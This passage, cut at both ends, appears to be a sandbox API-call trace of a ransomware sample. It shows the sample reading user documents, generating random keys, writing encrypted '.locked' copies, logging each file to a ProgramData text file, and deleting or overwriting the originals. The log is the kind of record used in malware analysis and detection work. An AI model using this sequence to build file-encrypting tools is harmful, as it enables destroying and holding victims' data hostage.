ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0299.855] SetEvent (hEvent=0x150) returned 1 [0299.855] SetEvent (hEvent=0x20c) returned 1 [0299.855] SetEvent (hEvent=0x1b8) returned 1 [0299.855] SetEvent (hEvent=0x1f0) returned 1 [0299.855] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0299.855] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766040 | out: pbBuffer=0x12766040) returned 1 [0299.855] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0299.855] WriteFile (in: hFile=0x228, lpBuffer=0x1267c000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12625d78, lpOverlapped=0x0 | out: lpBuffer=0x1267c000*, lpNumberOfBytesWritten=0x12625d78*=0x80, lpOverlapped=0x0) returned 1 [0299.893] ReadFile (in: hFile=0x230, lpBuffer=0x16b0c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12625d68, lpOverlapped=0x0 | out: lpBuffer=0x16b0c000*, lpNumberOfBytesRead=0x12625d68*=0x18ec3, lpOverlapped=0x0) returned 1 [0299.897] WriteFile (in: hFile=0x228, lpBuffer=0x16b0c000*, nNumberOfBytesToWrite=0x18ec3, lpNumberOfBytesWritten=0x12625d74, lpOverlapped=0x0 | out: lpBuffer=0x16b0c000*, lpNumberOfBytesWritten=0x12625d74*=0x18ec3, lpOverlapped=0x0) returned 1 [0300.027] ReadFile (in: hFile=0x230, lpBuffer=0x16b0c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12625d68, lpOverlapped=0x0 | out: lpBuffer=0x16b0c000*, lpNumberOfBytesRead=0x12625d68*=0x0, lpOverlapped=0x0) returned 1 [0300.027] CloseHandle (hObject=0x228) returned 1 [0300.038] CloseHandle (hObject=0x230) returned 1 [0300.038] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0300.039] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12625e94 | out: lpMode=0x12625e94) returned 0 [0300.039] WriteFile (in: hFile=0x230, lpBuffer=0x12348210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x12625e64, lpOverlapped=0x0 | out: lpBuffer=0x12348210*, lpNumberOfBytesWritten=0x12625e64*=0x30, lpOverlapped=0x0) returned 1 [0300.039] CloseHandle (hObject=0x230) returned 1 [0300.041] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ifzi1.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ifzi1.xlsx")) returned 1 [0300.076] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0300.431] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0300.437] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0300.450] SetEvent (hEvent=0x14c) returned 1 [0300.450] SetEvent (hEvent=0x20c) returned 1 [0300.450] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0303.755] SetEvent (hEvent=0x1ac) returned 1 [0303.755] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x0 [0303.770] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x0 [0303.771] SetEvent (hEvent=0x22c) returned 1 [0303.771] SetEvent (hEvent=0x134) returned 1 [0303.771] SetEvent (hEvent=0x12c) returned 1 [0303.771] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0303.772] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0303.773] SetEvent (hEvent=0x150) returned 1 [0303.773] SetEvent (hEvent=0x12c) returned 1 [0303.773] SetEvent (hEvent=0x134) returned 1 [0303.773] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\4bt-B2q.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\4bt-b2q.pdf")) returned 1 [0303.819] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0303.875] SetEvent (hEvent=0x20c) returned 1 [0303.875] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0303.911] SetEvent (hEvent=0x1f0) returned 1 [0303.911] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0303.929] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0303.932] SetEvent (hEvent=0x214) returned 1 [0303.932] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.054] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12663a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x12663a24*=0xb) returned 1 [0304.057] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\O4XyZ4ZdDUL8nyTp.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\o4xyz4zddul8nytp.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0304.057] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0304.057] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\O4XyZ4ZdDUL8nyTp.csv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\o4xyz4zddul8nytp.csv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0304.060] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.191] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0304.191] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0304.191] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766050 | out: pbBuffer=0x12766050) returned 1 [0304.191] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0304.191] WriteFile (in: hFile=0x200, lpBuffer=0x123a6000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12663d78, lpOverlapped=0x0 | out: lpBuffer=0x123a6000*, lpNumberOfBytesWritten=0x12663d78*=0x80, lpOverlapped=0x0) returned 1 [0304.194] ReadFile (in: hFile=0x1a4, lpBuffer=0x15694000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12663d68, lpOverlapped=0x0 | out: lpBuffer=0x15694000*, lpNumberOfBytesRead=0x12663d68*=0x3fbb, lpOverlapped=0x0) returned 1 [0304.196] WriteFile (in: hFile=0x200, lpBuffer=0x15694000*, nNumberOfBytesToWrite=0x3fbb, lpNumberOfBytesWritten=0x12663d74, lpOverlapped=0x0 | out: lpBuffer=0x15694000*, lpNumberOfBytesWritten=0x12663d74*=0x3fbb, lpOverlapped=0x0) returned 1 [0304.213] ReadFile (in: hFile=0x1a4, lpBuffer=0x15694000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12663d68, lpOverlapped=0x0 | out: lpBuffer=0x15694000*, lpNumberOfBytesRead=0x12663d68*=0x0, lpOverlapped=0x0) returned 1 [0304.214] CloseHandle (hObject=0x200) returned 1 [0304.256] CloseHandle (hObject=0x1a4) returned 1 [0304.257] SetEvent (hEvent=0x21c) returned 1 [0304.257] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0304.306] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.306] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0304.329] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.329] SetEvent (hEvent=0x214) returned 1 [0304.329] SetEvent (hEvent=0x134) returned 1 [0304.329] SetEvent (hEvent=0x21c) returned 1 [0304.329] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.332] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0304.332] SetEvent (hEvent=0x150) returned 1 [0304.332] SetEvent (hEvent=0x134) returned 1 [0304.332] SetEvent (hEvent=0x21c) returned 1 [0304.332] SetEvent (hEvent=0x214) returned 1 [0304.332] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0304.333] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x124a3e94 | out: lpMode=0x124a3e94) returned 0 [0304.333] WriteFile (in: hFile=0x1c0, lpBuffer=0x126d00c0*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x124a3e64, lpOverlapped=0x0 | out: lpBuffer=0x126d00c0*, lpNumberOfBytesWritten=0x124a3e64*=0x53, lpOverlapped=0x0) returned 1 [0304.333] CloseHandle (hObject=0x1c0) returned 1 [0304.335] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\O4XyZ4ZdDUL8nyTp.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\o4xyz4zddul8nytp.csv")) returned 1 [0304.412] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.527] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.528] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.659] SetEvent (hEvent=0x14c) returned 1 [0304.659] SetEvent (hEvent=0x1dc) returned 1 [0304.659] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.661] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.704] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0304.717] SetEvent (hEvent=0x134) returned 1 [0304.717] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0305.250] SetEvent (hEvent=0x198) returned 1 [0305.250] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0305.425] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0305.425] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0305.427] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0305.427] SetEvent (hEvent=0x198) returned 1 [0305.427] SetEvent (hEvent=0x1b8) returned 1 [0305.427] SetEvent (hEvent=0x220) returned 1 [0305.427] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0305.442] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0305.442] SetEvent (hEvent=0x150) returned 1 [0305.442] SetEvent (hEvent=0x1b8) returned 1 [0305.442] SetEvent (hEvent=0x220) returned 1 [0305.442] SetEvent (hEvent=0x198) returned 1 [0305.442] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0305.442] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e020 | out: pbBuffer=0x1234e020) returned 1 [0305.442] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0305.442] WriteFile (in: hFile=0x180, lpBuffer=0x1275f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12623d78, lpOverlapped=0x0 | out: lpBuffer=0x1275f000*, lpNumberOfBytesWritten=0x12623d78*=0x80, lpOverlapped=0x0) returned 1 [0305.448] ReadFile (in: hFile=0x1b0, lpBuffer=0x1339e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12623d68, lpOverlapped=0x0 | out: lpBuffer=0x1339e000*, lpNumberOfBytesRead=0x12623d68*=0x110e5, lpOverlapped=0x0) returned 1 [0305.452] WriteFile (in: hFile=0x180, lpBuffer=0x1339e000*, nNumberOfBytesToWrite=0x110e5, lpNumberOfBytesWritten=0x12623d74, lpOverlapped=0x0 | out: lpBuffer=0x1339e000*, lpNumberOfBytesWritten=0x12623d74*=0x110e5, lpOverlapped=0x0) returned 1 [0305.510] ReadFile (in: hFile=0x1b0, lpBuffer=0x1339e000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12623d68, lpOverlapped=0x0 | out: lpBuffer=0x1339e000*, lpNumberOfBytesRead=0x12623d68*=0x0, lpOverlapped=0x0) returned 1 [0305.510] CloseHandle (hObject=0x180) returned 1 [0305.551] CloseHandle (hObject=0x1b0) returned 1 [0305.551] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0305.551] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12623e94 | out: lpMode=0x12623e94) returned 0 [0305.551] WriteFile (in: hFile=0x1b0, lpBuffer=0x125ec0f0*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x12623e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec0f0*, lpNumberOfBytesWritten=0x12623e64*=0x49, lpOverlapped=0x0) returned 1 [0305.551] CloseHandle (hObject=0x1b0) returned 1 [0305.555] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\Vi-SNb.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vi-snb.xls")) returned 1 [0305.746] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0305.856] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0305.858] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0305.898] SetEvent (hEvent=0x21c) returned 1 [0305.898] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0306.698] SetEvent (hEvent=0x14c) returned 1 [0306.698] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0306.773] SetEvent (hEvent=0x22c) returned 1 [0306.773] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0306.783] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0306.787] SetEvent (hEvent=0x1f0) returned 1 [0306.787] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0306.931] SetEvent (hEvent=0x214) returned 1 [0306.931] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0306.978] SetEvent (hEvent=0x1ac) returned 1 [0306.978] SetEvent (hEvent=0x1b8) returned 1 [0306.978] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0307.428] SetEvent (hEvent=0x22c) returned 1 [0307.428] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0307.496] SetEvent (hEvent=0x190) returned 1 [0307.496] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0307.564] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\tONZR0L5XBEql C.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tonzr0l5xbeql c.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0307.565] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0307.565] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\tONZR0L5XBEql C.odt.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tonzr0l5xbeql c.odt.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0307.709] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0308.066] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0308.066] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0308.066] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0308.066] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0308.066] WriteFile (in: hFile=0x218, lpBuffer=0x126fb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a1d78, lpOverlapped=0x0 | out: lpBuffer=0x126fb000*, lpNumberOfBytesWritten=0x123a1d78*=0x80, lpOverlapped=0x0) returned 1 [0308.074] ReadFile (in: hFile=0x1b0, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x123a1d68*=0x17361, lpOverlapped=0x0) returned 1 [0308.079] WriteFile (in: hFile=0x218, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x17361, lpNumberOfBytesWritten=0x123a1d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x123a1d74*=0x17361, lpOverlapped=0x0) returned 1 [0308.146] ReadFile (in: hFile=0x1b0, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x123a1d68*=0x0, lpOverlapped=0x0) returned 1 [0308.146] CloseHandle (hObject=0x218) returned 1 [0308.149] CloseHandle (hObject=0x1b0) returned 1 [0308.150] SetEvent (hEvent=0x12c) returned 1 [0308.150] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0308.161] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0308.161] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0308.177] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0308.177] SetEvent (hEvent=0x214) returned 1 [0308.177] SetEvent (hEvent=0x134) returned 1 [0308.177] SetEvent (hEvent=0x12c) returned 1 [0308.177] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0308.180] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0308.181] SetEvent (hEvent=0x150) returned 1 [0308.181] SetEvent (hEvent=0x134) returned 1 [0308.181] SetEvent (hEvent=0x12c) returned 1 [0308.181] SetEvent (hEvent=0x214) returned 1 [0308.181] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0308.181] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x125dae94 | out: lpMode=0x125dae94) returned 0 [0308.181] WriteFile (in: hFile=0x228, lpBuffer=0x1234a280*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x125dae64, lpOverlapped=0x0 | out: lpBuffer=0x1234a280*, lpNumberOfBytesWritten=0x125dae64*=0x39, lpOverlapped=0x0) returned 1 [0308.181] CloseHandle (hObject=0x228) returned 1 [0308.183] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\tONZR0L5XBEql C.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tonzr0l5xbeql c.odt")) returned 1 [0308.350] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0308.357] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0308.357] SetEvent (hEvent=0x220) returned 1 [0308.357] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0308.372] SetEvent (hEvent=0x20c) returned 1 [0308.372] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0308.465] SetEvent (hEvent=0x12c) returned 1 [0308.465] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0308.513] WriteFile (in: hFile=0x180, lpBuffer=0x1264a040*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x1276ee64, lpOverlapped=0x0 | out: lpBuffer=0x1264a040*, lpNumberOfBytesWritten=0x1276ee64*=0x3d, lpOverlapped=0x0) returned 1 [0308.513] CloseHandle (hObject=0x180) returned 1 [0308.514] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\aSlWuoctTT0Qhm.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\aslwuocttt0qhm.odp")) returned 1 [0308.551] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0308.646] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\aSlWuoctTT0Qhm.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\aslwuocttt0qhm.odp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0309.387] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.415] SetEvent (hEvent=0x20c) returned 1 [0309.415] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1276ee88 | out: lpMode=0x1276ee88) returned 0 [0309.415] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.516] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.527] SetEvent (hEvent=0x1e8) returned 1 [0309.527] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.539] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.540] SetEvent (hEvent=0x220) returned 1 [0309.540] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.615] SetEvent (hEvent=0x20c) returned 1 [0309.615] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.619] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.626] SetEvent (hEvent=0x1ac) returned 1 [0309.626] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.629] SetEvent (hEvent=0x20c) returned 1 [0309.629] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x0 [0309.641] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0309.643] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.643] SetEvent (hEvent=0x220) returned 1 [0309.643] SetEvent (hEvent=0x190) returned 1 [0309.643] SetEvent (hEvent=0x214) returned 1 [0309.643] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0309.643] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0309.643] SetEvent (hEvent=0x220) returned 1 [0309.643] SetEvent (hEvent=0x190) returned 1 [0309.643] SetEvent (hEvent=0x214) returned 1 [0309.643] WriteFile (in: hFile=0x1f4, lpBuffer=0x123a80e0*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x124a1e64, lpOverlapped=0x0 | out: lpBuffer=0x123a80e0*, lpNumberOfBytesWritten=0x124a1e64*=0x65, lpOverlapped=0x0) returned 1 [0309.644] CloseHandle (hObject=0x1f4) returned 1 [0309.645] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\5yOfoWHhdYqKnUlxPol.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\5yofowhhdyqknulxpol.mp3")) returned 1 [0309.652] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0310.006] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\5yOfoWHhdYqKnUlxPol.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\5yofowhhdyqknulxpol.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0310.015] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x124a1e88 | out: lpMode=0x124a1e88) returned 0 [0310.016] WriteFile (in: hFile=0x230, lpBuffer=0x13a28000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a1e78, lpOverlapped=0x0 | out: lpBuffer=0x13a28000*, lpNumberOfBytesWritten=0x124a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0310.031] CloseHandle (hObject=0x230) returned 1 [0310.032] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\5yOfoWHhdYqKnUlxPol.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\5yofowhhdyqknulxpol.mp3")) returned 1 [0310.162] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0310.442] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12665a24, lpReserved=0x0 | out: lpBuffer=0x12390020*, lpNumberOfCharsWritten=0x12665a24*=0xc) returned 1 [0310.511] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0310.557] SetEvent 